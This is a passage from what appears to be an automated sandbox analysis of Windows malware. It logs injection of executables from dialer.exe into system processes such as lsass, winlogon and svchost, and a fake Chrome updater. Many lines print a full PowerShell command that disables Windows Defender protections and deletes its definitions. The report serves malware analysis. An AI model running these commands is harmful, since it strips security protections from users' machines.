                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1DA61CB0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D280EE0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 29A47940000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\ProgramData\Microsoft\based.exe base: 235BB850000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\ProgramData\Microsoft\based.exe base: 1EB88710000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\cmd.exe base: 2879CCE0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1BCECE80000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 22E54100000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\ProgramData\svchost.exe base: 2C3F57C0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\ProgramData\svchost.exe base: 23340F40000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 10E63130000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\cmd.exe base: 181280D0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 261E5AC0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\cmd.exe base: 1EC96960000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 13C461D0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Google\Chrome\updater.exe base: 23E9EDD0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\timeout.exe base: 285327A0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\cmd.exe base: 1EC96AF0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1D8E5800000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: PID: 2580 base: 87C0000 value: 4D
                                  Source: C:\ProgramData\setup.exeSection loaded: NULL target: C:\Windows\System32\dialer.exe protection: readonly
                                  Source: C:\Program Files\Google\Chrome\updater.exeSection loaded: NULL target: unknown protection: readonly
                                  Source: C:\Program Files\Google\Chrome\updater.exeSection loaded: NULL target: unknown protection: readonly
                                  Source: C:\Program Files\Google\Chrome\updater.exeSection loaded: NULL target: unknown protection: readonly
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                  Source: C:\ProgramData\setup.exeThread register set: target process: 7448
                                  Source: C:\ProgramData\svchost.exeThread register set: target process: 7704
                                  Source: C:\ProgramData\svchost.exeThread register set: target process: 7704
                                  Source: C:\ProgramData\svchost.exeThread register set: target process: 7704
                                  Source: C:\Program Files\Google\Chrome\updater.exeThread register set: target process: 4544
                                  Source: C:\Program Files\Google\Chrome\updater.exeThread register set: target process: 5940
                                  Source: C:\Program Files\Google\Chrome\updater.exeThread register set: target process: 5088
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                                  Source: C:\ProgramData\setup.exeMemory written: C:\Windows\System32\dialer.exe base: 8E851E9010
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC610000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0AB0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A6612D0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAF1B0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26A87990000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17953770000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2295D530000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 253067D0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1845B380000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D559040000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 241A9E70000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD73160000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2824E860000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21B473C0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2086F9D0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17183BC0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23FD3F70000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2A4150000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 275BDF30000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1AAC0260000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 203C9F30000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5645B0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1C004F60000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 24E2AB40000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2644ADB0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1990000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20D25DA0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26EF5350000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B1C2570000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2108BCE0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 29166930000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1988D570000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 13869B40000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E1CC740000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2855DA70000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2BF199D0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 15AF3890000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21A03B80000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\sihost.exe base: 1CD40E40000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 151A6530000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 19E27BC0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17D7B150000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BE621A0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2252F480000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ctfmon.exe base: 1F28B550000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 184683D0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\explorer.exe base: 87C0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1972E260000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 221D5930000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1D178740000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A633B40000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2928D0A0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21C6CF30000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF644F0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\audiodg.exe base: 1D349350000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1DBEC970000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 293C71D0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 124A2600000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 2DB0D940000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 22D67CF0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 231E6560000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 200CD9C0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1DA61CB0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D280EE0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 29A47940000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\ProgramData\Microsoft\based.exe base: 235BB850000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\ProgramData\Microsoft\based.exe base: 1EB88710000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\cmd.exe base: 2879CCE0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1BCECE80000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 22E54100000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\ProgramData\svchost.exe base: 2C3F57C0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\ProgramData\svchost.exe base: 23340F40000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 10E63130000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\cmd.exe base: 181280D0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 261E5AC0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\cmd.exe base: 1EC96960000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 13C461D0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Google\Chrome\updater.exe base: 23E9EDD0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\timeout.exe base: 285327A0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\cmd.exe base: 1EC96AF0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1D8E5800000
                                  Source: C:\Program Files\Google\Chrome\updater.exeMemory written: C:\Windows\System32\dialer.exe base: 6C617B8010
                                  Source: C:\Program Files\Google\Chrome\updater.exeMemory written: C:\Windows\System32\dialer.exe base: FF10D1D010
                                  Source: C:\Program Files\Google\Chrome\updater.exeMemory written: C:\Windows\System32\dialer.exe base: B54D3D2010
                                  Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 26E29160000
                                  Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 26E29160000
                                  Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 26E29160000
                                  Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 26E29160000
                                  Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 26E29160000
                                  Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 26E29160000
                                  Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 26E29160000
                                  Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 26E29160000
                                  Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 26E29160000
                                  Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 26E29160000
                                  Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 26E29160000
                                  Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 29BD4210000
                                  Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 29BD4210000
                                  Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 29BD4210000
                                  Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 29BD4210000
                                  Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 29BD4210000
                                  Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 29BD4210000
                                  Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 29BD4210000
                                  Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 29BD4210000
                                  Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 29BD4210000
                                  Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 29BD4210000
                                  Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 29BD4210000
                                  Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 29BD5EB0000
                                  Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 268650A0000
                                  Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 268650A0000
                                  Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 268650A0000
                                  Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 268650A0000
                                  Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 268650A0000
                                  Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 268650A0000
                                  Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 268650A0000
                                  Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 268650A0000
                                  Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 268650A0000
                                  Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 268650A0000
